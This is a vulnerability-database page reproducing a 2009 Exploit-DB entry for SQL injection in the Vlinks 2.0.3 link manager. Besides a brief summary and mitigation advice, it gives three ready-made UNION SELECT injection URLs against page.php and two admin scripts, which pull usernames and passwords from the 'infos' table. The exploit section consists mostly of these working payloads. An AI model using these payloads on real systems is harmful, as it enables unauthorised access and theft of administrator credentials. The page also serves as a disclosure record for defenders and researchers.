header-logo
Suggest Exploit
vendor:
Vlinks
by:
JIKO(JAWAD)
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Vlinks
Affected Version From: 2.0.3
Affected Version To: 2.0.3
Patch Exists: NO
Related CWE: N/A
CPE: a:vlinks:vlinks
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

vlinks SQL Injection Vulnerability

A SQL injection vulnerability exists in vlinks, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in the 'page.php' script, and the 'id' and 'idc' parameters in the 'admin_modif_categorie.php' and 'admin_modif_partenaire.php' scripts, respectively. An attacker can use these vulnerabilities to gain access to the admin panel and extract sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, access to the admin panel should be restricted to trusted users.
Source

Exploit-DB raw data:

#########################################################################################
[!x!] Informations:
 
Name           : vlinks
Download       : http://www.vlinks.org/ =>http://www.vlinks.org/telechargements/Vlinks2.0.3.zip (And All Version)
Vulnerability  : Sql Injection
Author         : JIKO(JAWAD)
Contact        : jalikom@hotmail.com
Site           : No-ExploiT.CoM (Is Back)
Notes          : No-ExploiT.CoM Miss
#########################################################################################
[!x!] Bug:
 
Bugged file is /[path]/page.php?
 
[Note]
Pass Simple
[/Note]
 
#########################################################################################
[!x!] Exploit:
 
Exploit: http://no-exploit.com/forum/site.php?ps=1&idc=1&id=-991 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6,7,8,9,10,11 from infos--

[Admin Panel] ! Need Login
Exploit: http://no-exploit.com/forum/admin/admin_modif_categorie.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2 from infos--
Exploit: http://no-exploit.com/forum/admin/admin_modif_partenaire.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6 from infos--
 
########################################################################################
[!x!] To: All friends
Cyber_Devil Allah with you

members [No-exploit.Com]

Navigation

Suggest Exploit

Services By CQR